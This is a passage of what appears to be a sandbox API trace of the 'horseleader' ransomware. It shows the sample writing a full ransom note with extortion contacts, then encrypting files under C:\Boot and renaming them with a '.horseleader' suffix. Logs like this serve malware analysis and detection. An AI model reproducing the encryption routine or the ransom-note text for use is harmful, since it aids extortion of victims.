(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0119.796] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0119.797] CloseHandle (hObject=0x200) returned 1 [0119.798] GetProcessHeap () returned 0x780000 [0119.798] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b67f0 | out: hHeap=0x780000) returned 1 [0119.798] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0119.798] FindClose (in: hFindFile=0x7c66e0 | out: hFindFile=0x7c66e0) returned 1 [0119.799] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\#Decrypt#.txt") returned 33 [0119.799] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\#Decrypt#.txt" (normalized: "c:\\$recycle.bin\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0121.089] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.089] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af578*=0x5e4, lpOverlapped=0x0) returned 1 [0121.091] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.091] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af578*=0x558, lpOverlapped=0x0) returned 1 [0121.091] CloseHandle (hObject=0x158) returned 1 [0121.091] GetProcessHeap () returned 0x780000 [0121.091] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.091] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0121.092] lstrcmpiW (lpString1="Boot", lpString2="Windows") returned -1 [0121.092] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0121.092] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0121.092] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0121.092] lstrcmpW (lpString1="\\\\?\\C:\\Boot", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.092] GetProcessHeap () returned 0x780000 [0121.092] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0121.092] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\*") returned 13 [0121.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName=".", cAlternateFileName="")) returned 0x7c66e0 [0121.093] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.093] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\.") returned 13 [0121.093] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.093] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0121.093] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0121.093] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0121.093] lstrlenW (lpString=".testttjffg") returned 11 [0121.093] StrStrW (lpFirst="\\\\?\\C:\\Boot\\.", lpSrch=".testttjffg") returned 0x0 [0121.093] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.094] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.094] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\." (normalized: "c:\\boot\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.094] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 1 [0121.094] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.094] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\..") returned 14 [0121.094] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.094] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0121.094] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0121.094] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0121.094] lstrlenW (lpString=".testttjffg") returned 11 [0121.094] StrStrW (lpFirst="\\\\?\\C:\\Boot\\..", lpSrch=".testttjffg") returned 0x0 [0121.095] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.095] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.095] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.095] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="BCD", cAlternateFileName="")) returned 1 [0121.095] lstrcmpiW (lpString1="BCD", lpString2="Windows") returned -1 [0121.095] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0121.095] StrStrIW (lpFirst="BCD", lpSrch=".horseleader") returned 0x0 [0121.095] lstrcmpW (lpString1="BCD", lpString2="#Decrypt#.txt") returned 1 [0121.095] lstrcmpW (lpString1="BCD", lpString2="_uninstalling_.png") returned 1 [0121.096] lstrlenW (lpString=".testttjffg") returned 11 [0121.096] StrStrW (lpFirst="\\\\?\\C:\\Boot\\BCD", lpSrch=".testttjffg") returned 0x0 [0121.096] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.096] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.096] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.096] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0121.097] lstrcmpiW (lpString1="BCD.LOG", lpString2="Windows") returned -1 [0121.097] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0121.097] StrStrIW (lpFirst="BCD.LOG", lpSrch=".horseleader") returned 0x0 [0121.097] lstrcmpW (lpString1="BCD.LOG", lpString2="#Decrypt#.txt") returned 1 [0121.097] lstrcmpW (lpString1="BCD.LOG", lpString2="_uninstalling_.png") returned 1 [0121.097] lstrlenW (lpString=".testttjffg") returned 11 [0121.097] StrStrW (lpFirst="\\\\?\\C:\\Boot\\BCD.LOG", lpSrch=".testttjffg") returned 0x0 [0121.097] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.097] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.097] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.098] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0121.098] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Windows") returned -1 [0121.098] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0121.099] StrStrIW (lpFirst="BCD.LOG1", lpSrch=".horseleader") returned 0x0 [0121.099] lstrcmpW (lpString1="BCD.LOG1", lpString2="#Decrypt#.txt") returned 1 [0121.099] lstrcmpW (lpString1="BCD.LOG1", lpString2="_uninstalling_.png") returned 1 [0121.099] lstrlenW (lpString=".testttjffg") returned 11 [0121.099] StrStrW (lpFirst="\\\\?\\C:\\Boot\\BCD.LOG1", lpSrch=".testttjffg") returned 0x0 [0121.099] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.099] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.099] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0121.100] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0121.100] StrStrW (lpFirst="BCD.LOG1", lpSrch=".txt") returned 0x0 [0121.100] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32af538 | out: lpFileSize=0x32af538*=0) returned 1 [0121.100] ReadFile (in: hFile=0x160, lpBuffer=0x32aa478, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesRead=0x32af55c*=0x0, lpOverlapped=0x0) returned 1 [0121.100] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.100] WriteFile (in: hFile=0x160, lpBuffer=0x32aa478*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesWritten=0x32af55c*=0x0, lpOverlapped=0x0) returned 1 [0121.101] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.101] WriteFile (in: hFile=0x160, lpBuffer=0x32af530*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af530*, lpNumberOfBytesWritten=0x32af55c*=0x4, lpOverlapped=0x0) returned 1 [0121.102] WriteFile (in: hFile=0x160, lpBuffer=0x32af478*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af478*, lpNumberOfBytesWritten=0x32af55c*=0x80, lpOverlapped=0x0) returned 1 [0121.102] CloseHandle (hObject=0x160) returned 1 [0121.615] GetProcessHeap () returned 0x780000 [0121.615] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.615] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1.horseleader") returned 32 [0121.615] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG1.horseleader" (normalized: "c:\\boot\\bcd.log1.horseleader")) returned 1 [0121.616] GetProcessHeap () returned 0x780000 [0121.616] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.616] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0121.617] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Windows") returned -1 [0121.617] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0121.617] StrStrIW (lpFirst="BCD.LOG2", lpSrch=".horseleader") returned 0x0 [0121.617] lstrcmpW (lpString1="BCD.LOG2", lpString2="#Decrypt#.txt") returned 1 [0121.617] lstrcmpW (lpString1="BCD.LOG2", lpString2="_uninstalling_.png") returned 1 [0121.617] lstrlenW (lpString=".testttjffg") returned 11 [0121.617] StrStrW (lpFirst="\\\\?\\C:\\Boot\\BCD.LOG2", lpSrch=".testttjffg") returned 0x0 [0121.617] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.618] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.618] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0121.618] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0121.618] StrStrW (lpFirst="BCD.LOG2", lpSrch=".txt") returned 0x0 [0121.618] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32af538 | out: lpFileSize=0x32af538*=0) returned 1 [0121.619] ReadFile (in: hFile=0x160, lpBuffer=0x32aa478, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesRead=0x32af55c*=0x0, lpOverlapped=0x0) returned 1 [0121.619] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.619] WriteFile (in: hFile=0x160, lpBuffer=0x32aa478*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesWritten=0x32af55c*=0x0, lpOverlapped=0x0) returned 1 [0121.619] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.619] WriteFile (in: hFile=0x160, lpBuffer=0x32af530*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af530*, lpNumberOfBytesWritten=0x32af55c*=0x4, lpOverlapped=0x0) returned 1 [0121.621] WriteFile (in: hFile=0x160, lpBuffer=0x32af478*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af478*, lpNumberOfBytesWritten=0x32af55c*=0x80, lpOverlapped=0x0) returned 1 [0121.621] CloseHandle (hObject=0x160) returned 1 [0121.623] GetProcessHeap () returned 0x780000 [0121.623] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.623] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2.horseleader") returned 32 [0121.623] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG2.horseleader" (normalized: "c:\\boot\\bcd.log2.horseleader")) returned 1 [0121.624] GetProcessHeap () returned 0x780000 [0121.624] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.625] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0121.625] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Windows") returned -1 [0121.625] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0121.625] StrStrIW (lpFirst="BOOTSTAT.DAT", lpSrch=".horseleader") returned 0x0 [0121.625] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="#Decrypt#.txt") returned 1 [0121.625] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="_uninstalling_.png") returned 1 [0121.625] lstrlenW (lpString=".testttjffg") returned 11 [0121.625] StrStrW (lpFirst="\\\\?\\C:\\Boot\\BOOTSTAT.DAT", lpSrch=".testttjffg") returned 0x0 [0121.625] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 